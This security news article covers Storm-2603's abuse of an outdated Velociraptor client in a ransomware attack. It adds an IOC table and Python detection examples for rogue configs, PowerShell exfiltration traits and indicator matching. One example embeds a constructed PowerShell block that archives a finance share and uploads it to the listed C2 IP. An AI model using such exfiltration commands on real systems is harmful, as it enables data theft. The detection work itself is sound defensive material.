Hackers Exploit DFIR Tool Velociraptor In Ransomware Attacks


Security researchers at Cisco Talos have confirmed that ransomware operators are actively exploiting Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in their attacks.

This is the first confirmed use of Velociraptor in a ransomware incident. The campaign, which deployed three separate ransomware strains, is attributed with moderate confidence to the threat actor Storm-2603.

The attack severely impacted the victim’s IT environment, encrypting VMware ESXi virtual machines and Windows servers using Warlock, LockBit, and Babuk ransomware.

[Image: ransom note]

Velociraptor is designed for security teams to perform endpoint monitoring and data collection, but in this campaign, it played a key role in helping the attackers maintain stealthy, persistent access.

After gaining initial entry, the threat actors installed an outdated version of Velociraptor (0.73.4.0), which is vulnerable to a privilege escalation flaw tracked as CVE-2025-6264.

This vulnerability can lead to arbitrary command execution and a complete takeover of the affected endpoint. The actors used this foothold to deploy LockBit and Babuk ransomware while remaining undetected, with the rogue client beaconing to an attacker-controlled Velociraptor server rather than to any server the victim operated.
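A rogue Velociraptor client gives itself away in two places a defender can check without waiting for the next beacon: the client config file points at a server the organisation does not run, and the build it was generated by predates the fix. The following is an added example, not code from the article or from the Velociraptor project; it parses a constructed client.config.yaml fragment laid out like a generated Velociraptor client config (a `version` section and a `Client` section with `server_urls`), flags any server host outside an assumed allowlist (`velo.corp.example` is a placeholder), and flags a build older than an assumed minimum patched release (0.74.3 here; confirm the number against the vendor advisory before relying on it). The server URL in the sample is the C2 domain from the article's indicator table, refanged.

```python
import re
from urllib.parse import urlparse

# Constructed client config fragment, not a real capture. It follows the
# layout of a generated Velociraptor client.config.yaml.
SAMPLE_CONFIG = """\
version:
  name: velociraptor
  version: 0.73.4
  commit: deadbeef
Client:
  server_urls:
  - https://velo.qaubctgg.workers.dev/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
    MIIB...
    -----END CERTIFICATE-----
  nonce: ZmFrZW5vbmNl
  writeback_windows: $ProgramFiles\\Velociraptor\\velociraptor.writeback.yaml
"""

# Hosts the organisation's legitimate Velociraptor servers answer on (assumption).
APPROVED_SERVER_HOSTS = {"velo.corp.example"}

# Assumed minimum release carrying the fix for CVE-2025-6264; verify against
# the vendor advisory for your deployment.
MIN_PATCHED_VERSION = (0, 74, 3)


def parse_version(text):
    """Return the build version string from the `version:` section, or None."""
    m = re.search(r"^\s*version:\s*([0-9][0-9.]*)\s*$", text, re.M)
    return m.group(1) if m else None


def version_tuple(ver):
    """'0.73.4' -> (0, 73, 4) so releases compare numerically, not lexically."""
    return tuple(int(p) for p in ver.split(".") if p)


def parse_server_urls(text):
    """Collect the list items under `server_urls:`."""
    m = re.search(r"^\s*server_urls:\s*\n((?:\s*-\s*\S+\s*\n)+)", text, re.M)
    if not m:
        return []
    return [line.strip().lstrip("-").strip() for line in m.group(1).splitlines()]


def assess_client_config(text):
    """Return a list of human-readable findings; empty means nothing anomalous."""
    findings = []
    ver = parse_version(text)
    if ver is None:
        findings.append("version: not found in config")
    elif version_tuple(ver) < MIN_PATCHED_VERSION:
        findings.append(f"version {ver} predates the fix for CVE-2025-6264")
    urls = parse_server_urls(text)
    if not urls:
        findings.append("server_urls: none found")
    for url in urls:
        host = urlparse(url).hostname or ""
        if host not in APPROVED_SERVER_HOSTS:
            findings.append(f"server_urls: unapproved server {host}")
    return findings


if __name__ == "__main__":
    for finding in assess_client_config(SAMPLE_CONFIG):
        print("FINDING:", finding)
```

Run it against every Velociraptor client config found on disk during a hunt; a legitimate deployment should produce no findings, so any output is worth a look even when the binary itself is signed and the process name looks familiar.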


This abuse of trusted security products aligns with a broader trend observed by Talos, where attackers increasingly leverage commercial and open-source tools to achieve their objectives.

Cisco Talos attributes this activity to Storm-2603, a suspected China-based group first identified in July 2025 exploiting the SharePoint vulnerability chain known as ToolShell. The attribution is based on significant overlaps in tools and tactics.

Storm-2603 is known for deploying both Warlock and LockBit ransomware in the same attack, and while LockBit is common, the use of Warlock is a strong indicator, as it has been heavily used by this group since it appeared in June 2025.

The deployment of three distinct ransomware variants, Warlock, LockBit, and Babuk, in a single engagement is highly unusual and strengthens the connection to Storm-2603. Although the group had not previously been seen using Babuk, the combination of TTPs points in their direction.

A Multi-faceted Attack Chain

The attack, first detected in mid-August 2025, involved a sophisticated chain of events. After gaining initial access, most likely through the ToolShell exploit, the actor escalated privileges by creating new admin accounts and syncing them to Entra ID.

They used these accounts to access the VMware vSphere console, ensuring persistent control over the virtual environment.

To impair defenses, the attackers modified Active Directory Group Policy Objects (GPOs) to disable Microsoft Defender’s real-time protection and behavior monitoring.

A fileless PowerShell script carried out the final encryption on Windows machines, while a Linux binary of the Babuk encryptor targeted ESXi servers.

The attack also featured a double extortion component: the actors used a custom PowerShell script to exfiltrate sensitive data before encryption, evading detection by suppressing PowerShell progress indicators and inserting sleep commands to slow down analysis.
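The traits described above (progress output silenced, sleeps between steps, data staged and pushed out over HTTP) are visible in PowerShell script block logging (Event ID 4104) even when the script never touches disk. The following is an added example, not code from the article or from Talos: a small scorer that runs regular expressions over recorded script block text and flags a block when several of those traits co-occur. The two script blocks are constructed for illustration; the upload target in the suspicious one is the exfiltration IP from the article's indicator table, refanged, and the threshold of three matching traits is an assumption to tune against your own baseline.

```python
import re

# Traits the article attributes to the exfiltration script, each as a regex
# over PowerShell source text. Case-insensitive because PowerShell is.
INDICATORS = {
    "progress_suppressed": re.compile(r"\$ProgressPreference\s*=\s*.SilentlyContinue.", re.I),
    "sleep_delay": re.compile(r"\bStart-Sleep\b", re.I),
    "archive_staging": re.compile(r"\bCompress-Archive\b", re.I),
    "outbound_upload": re.compile(
        r"\b(Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadFile)\b", re.I
    ),
}

# Flag a block once this many distinct traits appear together (assumption).
SUSPICIOUS_THRESHOLD = 3

# Constructed script block text, as it would appear in a 4104 event payload.
SUSPICIOUS_BLOCK = """\
$ProgressPreference = 'SilentlyContinue'
$src = 'C:\\Shares\\Finance'
Compress-Archive -Path $src -DestinationPath $env:TEMP\\f.zip -Force
Start-Sleep -Seconds 120
Invoke-WebRequest -Uri 'http://65.38.121.226/up' -Method Post -InFile $env:TEMP\\f.zip
"""

# Constructed benign admin script: one trait alone is not enough to flag.
BENIGN_BLOCK = """\
Get-Service -Name Spooler | Restart-Service
Start-Sleep -Seconds 5
Get-Service -Name Spooler
"""


def analyze_script_block(text):
    """Return the sorted list of matching trait names and a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"hits": hits, "suspicious": len(hits) >= SUSPICIOUS_THRESHOLD}


if __name__ == "__main__":
    for label, block in (("suspicious", SUSPICIOUS_BLOCK), ("benign", BENIGN_BLOCK)):
        print(label, analyze_script_block(block))
```

Because the verdict rests on co-occurrence rather than any single cmdlet, routine maintenance scripts that merely sleep or zip files stay below the threshold, while the staged-then-uploaded pattern stands out.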

Indicators of compromise

Indicator type                          Indicator value
C2/exfiltration IP                      65.38.121[.]226
Malicious MSI download domain           stoaccinfoniqaveeambkp.blob.core.windows[.]net
Velociraptor C2 server                  velo.qaubctgg.workers[.]dev
Velociraptor installer (SHA256)         649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421
Velociraptor.exe (SHA256)               12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7
Malicious config.yaml (SHA256)          A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023
In.exe, NTLM downgrade tool (SHA256)    C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A
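The indicators above are published defanged (`[.]` in place of `.`), which stops accidental clicks but also stops a naive string search from matching live logs. The following is an added example, not code from the article: it refangs the table, builds boundary-aware patterns so that the IP does not match inside a longer address and hashes match regardless of case, and runs them over a few constructed DNS, proxy and process-creation log lines. The log format and hostnames are invented for illustration; only the indicator values come from the article.

```python
import re

# Indicator table from the article, kept defanged exactly as published.
IOCS = {
    "65.38.121[.]226": "C2/exfiltration IP",
    "stoaccinfoniqaveeambkp.blob.core.windows[.]net": "malicious MSI download domain",
    "velo.qaubctgg.workers[.]dev": "Velociraptor C2 server",
    "649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421": "Velociraptor installer",
    "12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7": "Velociraptor.exe",
    "A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023": "malicious config.yaml",
    "C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A": "In.exe NTLM downgrade tool",
}

# Constructed log lines (invented format and internal hosts) for the demo.
SAMPLE_LOGS = [
    "2025-08-14T02:11:09Z dns client=10.0.4.21 query=velo.qaubctgg.workers.dev type=A",
    "2025-08-14T02:12:40Z proxy client=10.0.4.21 dst=65.38.121.226:443 method=POST bytes=5242880",
    "2025-08-14T02:13:02Z proc host=SRV-FS01 image=C:\\ProgramData\\velociraptor.exe "
    "sha256=12f177290a299bae8a363f47775fb99f305bbdd56bbdfddb39595b43112f9fb7",
    "2025-08-14T02:15:55Z dns client=10.0.4.22 query=updates.corp.example type=A",
    "2025-08-14T02:16:10Z proxy client=10.0.4.23 dst=165.38.121.226:443 method=GET bytes=512",
]


def refang(ioc):
    """Undo the usual publication-safe mangling so the value matches live data."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def compile_iocs(iocs=IOCS):
    """Map each label to a pattern that only matches the whole indicator token."""
    patterns = {}
    for ioc, label in iocs.items():
        token = re.escape(refang(ioc))
        # No letter, digit, dot or hyphen may touch either side of the match,
        # so 65.38.121.226 does not fire on 165.38.121.226.
        patterns[label] = re.compile(
            r"(?<![A-Za-z0-9.\-])" + token + r"(?![A-Za-z0-9.\-])", re.I
        )
    return patterns


def scan(lines, iocs=IOCS):
    """Return (line_index, label, matched_text) for every indicator hit."""
    patterns = compile_iocs(iocs)
    hits = []
    for idx, line in enumerate(lines):
        for label, rx in patterns.items():
            m = rx.search(line)
            if m:
                hits.append((idx, label, m.group(0)))
    return hits


if __name__ == "__main__":
    for idx, label, text in scan(SAMPLE_LOGS):
        print(f"line {idx}: {label}: {text}")
```

The last sample line is there to show the boundary check doing its job: an address that merely contains the C2 IP as a suffix is not reported.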


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.